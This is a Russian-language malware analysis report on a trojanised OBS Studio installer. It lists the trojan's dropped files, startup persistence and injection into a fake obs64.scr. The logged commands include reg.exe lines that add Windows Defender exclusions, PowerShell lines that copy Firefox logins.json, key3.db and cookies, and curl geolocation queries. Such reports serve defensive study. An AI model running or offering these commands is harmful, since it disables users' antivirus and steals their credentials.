Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\obs studio.lnk
- <SYSTEM32>\tasks\ar
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS] 'dlL' = '00000000'
- [<HKLM>\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs] 'scr' = '00000000'
- [<HKLM>\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions] 'CMd' = '00000000'
- [<HKLM>\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs] 'eXe' = '00000000'
- [<HKLM>\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS] '<DRIVERS>\etC\hostS' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"
Внедряет код в
следующие пользовательские процессы:
- obs64.scr
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\is-flud7.tmp\<Имя файла>.tmp
- %TEMP%\2p1r6t4u.tmp
- %TEMP%\autc9d3.tmp
- %WINDIR%\temp\autc5ff.tmp
- %WINDIR%\temp\autc5de.tmp
- %WINDIR%\temp\2a9w2f8i.tmp
- %WINDIR%\temp\autc58f.tmp
- %WINDIR%\temp\autbcea.tmp
- %WINDIR%\temp\autbba2.tmp
- %WINDIR%\temp\2h4a9d6l.tmp
- %WINDIR%\temp\autbb24.tmp
- %TEMP%\autb04d.tmp
- %TEMP%\autb02d.tmp
- %TEMP%\2u4s2p0h.tmp
- %TEMP%\autafce.tmp
- %WINDIR%\temp\autafb1.tmp
- %WINDIR%\temp\autaf72.tmp
- %WINDIR%\temp\2u4s5p2h.tmp
- %WINDIR%\temp\autaf51.tmp
- %WINDIR%\temp\autae3b.tmp
- %WINDIR%\temp\autae2a.tmp
- %WINDIR%\temp\2q8q6f8x.tmp
- %WINDIR%\temp\autae0a.tmp
- %TEMP%\auta545.tmp
- %TEMP%\auta535.tmp
- %TEMP%\4udw8a8q.tmp
- %TEMP%\autca03.tmp
- %TEMP%\autca33.tmp
- %WINDIR%\temp\autd548.tmp
- %WINDIR%\temp\2v8u7q2i.tmp
- %TEMP%\5dp5fkh4nm487n3xgu419sgqeqy41.sess
- %TEMP%\ml6egk2h6iheqj1k06n.tmp
- %WINDIR%\temp\autf8d1.tmp
- %WINDIR%\temp\autf8b1.tmp
- %WINDIR%\temp\2l0n2t4l.tmp
- %WINDIR%\temp\autf852.tmp
- %APPDATA%\obs-studio\bin\64bit\.vbs
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %WINDIR%\temp\autea12.tmp
- %WINDIR%\temp\autea01.tmp
- %WINDIR%\temp\1s8b5o6n.tmp
- %WINDIR%\temp\aute9f1.tmp
- %WINDIR%\temp\aute9b3.tmp
- %WINDIR%\temp\aute9c4.tmp
- %WINDIR%\temp\3d0b3u6w.tmp
- %WINDIR%\temp\aute983.tmp
- %TEMP%\autdd46.tmp
- %TEMP%\autdd35.tmp
- %TEMP%\1l7t1x6s.tmp
- %TEMP%\autdcc7.tmp
- %WINDIR%\temp\autd818.tmp
- %WINDIR%\temp\autd78a.tmp
- %WINDIR%\temp\2v8z2d8p.tmp
- %WINDIR%\temp\autd75b.tmp
- %WINDIR%\temp\autd589.tmp
- %WINDIR%\temp\autd568.tmp
- %TEMP%\caqbhrc5z68a1231612.tmp
- %TEMP%\auta515.tmp
- %WINDIR%\temp\auta44c.tmp
- %WINDIR%\temp\auta42c.tmp
- %APPDATA%\obs-studio\bin\64bit\is-ov6ot.tmp
- %APPDATA%\obs-studio\bin\64bit\is-363ko.tmp
- %APPDATA%\obs-studio\bin\64bit\is-iqbj5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-marc9.tmp
- %APPDATA%\obs-studio\bin\64bit\is-mepc5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-5tdcd.tmp
- %APPDATA%\obs-studio\bin\64bit\is-usc63.tmp
- %APPDATA%\obs-studio\bin\64bit\is-fl5f3.tmp
- %APPDATA%\obs-studio\bin\64bit\is-bt3pb.tmp
- %APPDATA%\obs-studio\bin\64bit\is-39kvk.tmp
- %APPDATA%\obs-studio\bin\64bit\is-miveh.tmp
- C:\tmp\is-rhoci.tmp
- %APPDATA%\obs-studio\bin\64bit\is-mii8k.tmp
- %APPDATA%\obs-studio\bin\64bit\is-4br9m.tmp
- %APPDATA%\obs-studio\bin\64bit\is-ap3uo.tmp
- %APPDATA%\obs-studio\bin\64bit\platforms\is-u4v20.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-u5i6a.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-la7pq.tmp
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-2t6cv.tmp
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-vck0l.tmp
- %TEMP%\is-stk2l.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-stk2l.tmp\_isetup\_setup64.tmp
- %TEMP%\is-s1vs5.tmp\<Имя файла>.tmp
- %TEMP%\is-d7th6.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-d7th6.tmp\_isetup\_setup64.tmp
- %APPDATA%\obs-studio\bin\64bit\is-4okqv.tmp
- %APPDATA%\obs-studio\bin\64bit\is-por7g.tmp
- %APPDATA%\obs-studio\bin\64bit\is-b93hd.tmp
- %APPDATA%\obs-studio\bin\64bit\is-kpur9.tmp
- %WINDIR%\temp\auta40b.tmp
- %TEMP%\aut95cb.tmp
- %TEMP%\aut959b.tmp
- %TEMP%\2l6u0a4m.tmp
- %TEMP%\aut94fe.tmp
- %TEMP%\is-stk2l.tmp\temp\.cmd
- C:\tmp\.vbs
- C:\tmp\.cmd
- %APPDATA%\obs-studio\bin\64bit\is-durvd.tmp
- %APPDATA%\obs-studio\bin\64bit\is-5sdub.tmp
- %APPDATA%\obs-studio\bin\64bit\is-afkk6.tmp
- %APPDATA%\obs-studio\bin\64bit\is-mdoqd.tmp
- %APPDATA%\obs-studio\bin\64bit\is-j4975.tmp
- %APPDATA%\obs-studio\bin\64bit\is-lbjgg.tmp
- %APPDATA%\obs-studio\bin\64bit\is-f0clo.tmp
- C:\tmp\is-bae4t.tmp
- %APPDATA%\obs-studio\bin\64bit\is-g9utj.tmp
- %APPDATA%\obs-studio\bin\64bit\is-tg3v6.tmp
- %APPDATA%\obs-studio\bin\64bit\is-q3a3u.tmp
- %TEMP%\is-stk2l.tmp\temp\is-qdieo.tmp
- %APPDATA%\obs-studio\bin\64bit\is-pl20v.tmp
- %APPDATA%\obs-studio\bin\64bit\is-oltbl.tmp
- %APPDATA%\obs-studio\bin\64bit\is-9thj1.tmp
- %APPDATA%\obs-studio\bin\64bit\styles\is-cobf5.tmp
- %APPDATA%\obs-studio\bin\64bit\is-nv2or.tmp
- %APPDATA%\obs-studio\bin\64bit\is-cc85r.tmp
- %WINDIR%\temp\3w0a0q0d.tmp
- %TEMP%\k47o6dgv3jen3t01241190.tmp-shm
Присваивает атрибут 'скрытый' для следующих файлов
- C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %TEMP%\is-stk2l.tmp\temp\r.exe
- %APPDATA%\obs-studio\bin\64bit\.cmd
- %APPDATA%\obs-studio\bin\64bit\.vbs
Удаляет следующие файлы
- %TEMP%\is-d7th6.tmp\_isetup\_setup64.tmp
- %WINDIR%\temp\aute983.tmp
- %TEMP%\is-stk2l.tmp\temp\.cmd
- %TEMP%\1l7t1x6s.tmp
- %TEMP%\autdd46.tmp
- %TEMP%\autdd35.tmp
- %TEMP%\autdcc7.tmp
- %WINDIR%\temp\aute9c4.tmp
- %WINDIR%\temp\aute9b3.tmp
- %WINDIR%\temp\autd78a.tmp
- %WINDIR%\temp\autd75b.tmp
- %WINDIR%\temp\2v8u7q2i.tmp
- %WINDIR%\temp\autd589.tmp
- %WINDIR%\temp\autd568.tmp
- %WINDIR%\temp\autd548.tmp
- %WINDIR%\temp\2v8z2d8p.tmp
- %WINDIR%\temp\2q8q6f8x.tmp
- %WINDIR%\temp\3d0b3u6w.tmp
- %TEMP%\ml6egk2h6iheqj1k06n.tmp
- %TEMP%\is-s1vs5.tmp\<Имя файла>.tmp
- %TEMP%\is-stk2l.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-stk2l.tmp\_isetup\_setup64.tmp
- %TEMP%\is-stk2l.tmp\temp\r.exe
- C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\ar.xml
- C:\tmp\obs32.dll
- %WINDIR%\temp\2l0n2t4l.tmp
- %WINDIR%\temp\autf8d1.tmp
- %WINDIR%\temp\autf8b1.tmp
- %WINDIR%\temp\autf852.tmp
- %WINDIR%\temp\1s8b5o6n.tmp
- %WINDIR%\temp\autea12.tmp
- %WINDIR%\temp\autea01.tmp
- %TEMP%\2p1r6t4u.tmp
- %WINDIR%\temp\autd818.tmp
- %TEMP%\autca33.tmp
- %TEMP%\autca03.tmp
- %TEMP%\autc9d3.tmp
- %WINDIR%\temp\auta42c.tmp
- %TEMP%\4udw8a8q.tmp
- %TEMP%\auta545.tmp
- %TEMP%\auta535.tmp
- %TEMP%\auta515.tmp
- %WINDIR%\temp\3w0a0q0d.tmp
- %WINDIR%\temp\auta44c.tmp
- %WINDIR%\temp\auta40b.tmp
- %WINDIR%\temp\autae2a.tmp
- %TEMP%\2l6u0a4m.tmp
- %TEMP%\aut95cb.tmp
- %TEMP%\aut959b.tmp
- %TEMP%\aut94fe.tmp
- %TEMP%\is-flud7.tmp\<Имя файла>.tmp
- %TEMP%\is-d7th6.tmp\_isetup\_shfoldr.dll
- %TEMP%\caqbhrc5z68a1231612.tmp
- %WINDIR%\temp\aute9f1.tmp
- %WINDIR%\temp\autae3b.tmp
- %WINDIR%\temp\autaf72.tmp
- %WINDIR%\temp\autae0a.tmp
- %WINDIR%\temp\2a9w2f8i.tmp
- %WINDIR%\temp\autc5ff.tmp
- %WINDIR%\temp\autc5de.tmp
- %WINDIR%\temp\autc58f.tmp
- %WINDIR%\temp\2h4a9d6l.tmp
- %WINDIR%\temp\autbcea.tmp
- %WINDIR%\temp\autbba2.tmp
- %WINDIR%\temp\autbb24.tmp
- %TEMP%\2u4s2p0h.tmp
- %TEMP%\autb04d.tmp
- %TEMP%\autb02d.tmp
- %TEMP%\autafce.tmp
- %WINDIR%\temp\2u4s5p2h.tmp
- %WINDIR%\temp\autafb1.tmp
- %WINDIR%\temp\autaf51.tmp
- %TEMP%\k47o6dgv3jen3t01241190.tmp-shm
Перемещает следующие файлы
- %APPDATA%\obs-studio\bin\64bit\iconengines\is-vck0l.tmp в %APPDATA%\obs-studio\bin\64bit\iconengines\qsvgicon.dll
- %APPDATA%\obs-studio\bin\64bit\is-cc85r.tmp в %APPDATA%\obs-studio\bin\64bit\obs64.scr
- %APPDATA%\obs-studio\bin\64bit\is-nv2or.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedtls.dll
- %APPDATA%\obs-studio\bin\64bit\styles\is-cobf5.tmp в %APPDATA%\obs-studio\bin\64bit\styles\qwindowsvistastyle.dll
- %APPDATA%\obs-studio\bin\64bit\is-9thj1.tmp в %APPDATA%\obs-studio\bin\64bit\avdevice-59.dll
- %APPDATA%\obs-studio\bin\64bit\is-oltbl.tmp в %APPDATA%\obs-studio\bin\64bit\lua51.dll
- %APPDATA%\obs-studio\bin\64bit\is-pl20v.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.exe
- %TEMP%\is-stk2l.tmp\temp\is-qdieo.tmp в %TEMP%\is-stk2l.tmp\temp\r.exe
- %APPDATA%\obs-studio\bin\64bit\is-39kvk.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-q3a3u.tmp в %APPDATA%\obs-studio\bin\64bit\obs-amf-test.pdb
- %APPDATA%\obs-studio\bin\64bit\is-g9utj.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.pdb
- C:\tmp\is-bae4t.tmp в C:\tmp\mainicon.ico
- %APPDATA%\obs-studio\bin\64bit\is-f0clo.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedx509.dll
- %APPDATA%\obs-studio\bin\64bit\is-j4975.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.pdb
- %APPDATA%\obs-studio\bin\64bit\is-lbjgg.tmp в %APPDATA%\obs-studio\bin\64bit\swresample-4.dll
- %APPDATA%\obs-studio\bin\64bit\is-mdoqd.tmp в %APPDATA%\obs-studio\bin\64bit\swscale-6.dll
- %APPDATA%\obs-studio\bin\64bit\is-afkk6.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.dll
- %APPDATA%\obs-studio\bin\64bit\is-b93hd.tmp в %APPDATA%\obs-studio\bin\64bit\libsrt.dll
- %APPDATA%\obs-studio\bin\64bit\is-kpur9.tmp в %APPDATA%\obs-studio\bin\64bit\libx264-164.dll
- %APPDATA%\obs-studio\bin\64bit\is-por7g.tmp в %APPDATA%\obs-studio\bin\64bit\librist.dll
- %APPDATA%\obs-studio\bin\64bit\is-4okqv.tmp в %APPDATA%\obs-studio\bin\64bit\obsglad.dll
- %APPDATA%\obs-studio\bin\64bit\is-ov6ot.tmp в %APPDATA%\obs-studio\bin\64bit\obs.pdb
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-la7pq.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qjpeg.dll
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-u5i6a.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qsvg.dll
- %APPDATA%\obs-studio\bin\64bit\platforms\is-u4v20.tmp в %APPDATA%\obs-studio\bin\64bit\platforms\qwindows.dll
- %APPDATA%\obs-studio\bin\64bit\is-ap3uo.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.dll
- %APPDATA%\obs-studio\bin\64bit\is-4br9m.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-d3d11.pdb
- %APPDATA%\obs-studio\bin\64bit\is-mii8k.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.dll
- C:\tmp\is-rhoci.tmp в C:\tmp\obs32.dll
- %APPDATA%\obs-studio\bin\64bit\is-5sdub.tmp в %APPDATA%\obs-studio\bin\64bit\w32-pthreads.pdb
- %APPDATA%\obs-studio\bin\64bit\is-tg3v6.tmp в %APPDATA%\obs-studio\bin\64bit\obs-ffmpeg-mux.exe
- %APPDATA%\obs-studio\bin\64bit\is-miveh.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-opengl.pdb
- %APPDATA%\obs-studio\bin\64bit\is-fl5f3.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.pdb
- %APPDATA%\obs-studio\bin\64bit\is-usc63.tmp в %APPDATA%\obs-studio\bin\64bit\libcurl.dll
- %APPDATA%\obs-studio\bin\64bit\is-5tdcd.tmp в %APPDATA%\obs-studio\bin\64bit\libmbedcrypto.dll
- %APPDATA%\obs-studio\bin\64bit\is-mepc5.tmp в %APPDATA%\obs-studio\bin\64bit\ar.xml
- %APPDATA%\obs-studio\bin\64bit\is-marc9.tmp в %APPDATA%\obs-studio\bin\64bit\libobs-winrt.pdb
- %APPDATA%\obs-studio\bin\64bit\is-iqbj5.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.dll
- %APPDATA%\obs-studio\bin\64bit\is-363ko.tmp в %APPDATA%\obs-studio\bin\64bit\obs-scripting.pdb
- %APPDATA%\obs-studio\bin\64bit\imageformats\is-2t6cv.tmp в %APPDATA%\obs-studio\bin\64bit\imageformats\qgif.dll
- %APPDATA%\obs-studio\bin\64bit\is-bt3pb.tmp в %APPDATA%\obs-studio\bin\64bit\obs-frontend-api.dll
- %APPDATA%\obs-studio\bin\64bit\is-durvd.tmp в %APPDATA%\obs-studio\bin\64bit\zlib.dll
Подменяет следующие файлы
- %TEMP%\is-stk2l.tmp\temp\.cmd
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\is-flud7.tmp\<Имя файла>.tmp' /SL5="$11022C,12110641,160256,<Полный путь к файлу>"
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr'
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /TI/ /sw:0 reg.eXe add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /TI/ /SW:0 reG.eXe add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /sw:0 reg.eXe add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /TI/ /sw:0 reg.exe add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /TI/ /SW:0 reG.eXe add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /sw:0 reg.exe add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /SW:0 reG.eXe add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /SW:0 reG.eXe add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /sw:0 reG.eXe Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '%TEMP%\is-s1vs5.tmp\<Имя файла>.tmp' /SL5="$130154,12110641,160256,<Полный путь к файлу>" /verysilent /sp-
- '%TEMP%\is-stk2l.tmp\temp\r.exe' /TI/ /sw:0 reG.eXe Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '%APPDATA%\obs-studio\bin\64bit\obs64.scr' ' (со скрытым окном)
- '<SYSTEM32>\reg.exe' Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\dkxosb80gq9m1231612.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP%\c...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-STK2L.tmp\temp\.cmd""' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f' (со скрытым окном)
- '%WINDIR%\syswow64\taskkill.exe' /f /im "obs64.scr"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f' (со скрытым окном)
- '<Полный путь к файлу>' /verysilent /sp-' (со скрытым окном)
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\formhistory.sqlite\" \"%TEMP%\1yo59n7dvd6typ321241190.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\cookies...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '<SYSTEM32>\rundll32.exe' C:\tmp\obs32.dll, Uaby
- '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-STK2L.tmp\temp\.cmd""
- '<SYSTEM32>\reg.exe' Add "hKlM\SoFTware\MICroSofT\wINdows deFender\eXcLusionS\exteNsioNS" /V dlL /t reg_dword /d 0 /F
- '<SYSTEM32>\reg.exe' add "hKlm\SOftWare\MiCrOSOFT\WiNdOWs deFeNder\excLUsiOns\eXTeNSIONs" /v scr /T reG_dwOrd /d 0 /f
- '<SYSTEM32>\reg.exe' add "hKLM\SOfTWare\mICrOSoFT\windOwS deFender\eXclUSiOnS\exTensions" /v CMd /t reg_dwOrd /d 0 /f
- '<SYSTEM32>\reg.exe' add "hKlM\SoFTware\mICrOsOFT\WIndoWs defender\eXcLUSioNs\eXtenSIoNs" /V eXe /T reg_dwOrd /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c cUrL -s ipINFO.io/Ip
- '<SYSTEM32>\reg.exe' add "hKlm\SOFTwAre\mICrOsoFT\windoWs deFender\eXCLUsionS\PAthS" /V "<DRIVERS>\etC\hostS" /T "reg_dWord" /d "0" /f
- '%WINDIR%\syswow64\cmd.exe' /c cuRL -s IPINfo.Io/city
- '%WINDIR%\syswow64\cmd.exe' /c cUrl -s IPiNfo.io/country
- '%WINDIR%\syswow64\attrib.exe' +s +H %APPDATA%\obs-studio\bin\64bit\.cmD
- '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\obs-studio\bin\64bit\.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\dkxosb80gq9m1231612.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP%\c...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\formhistory.sqlite\" \"%TEMP%\1yo59n7dvd6typ321241190.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\\Profiles/gn7ryp3k.default\cookies...
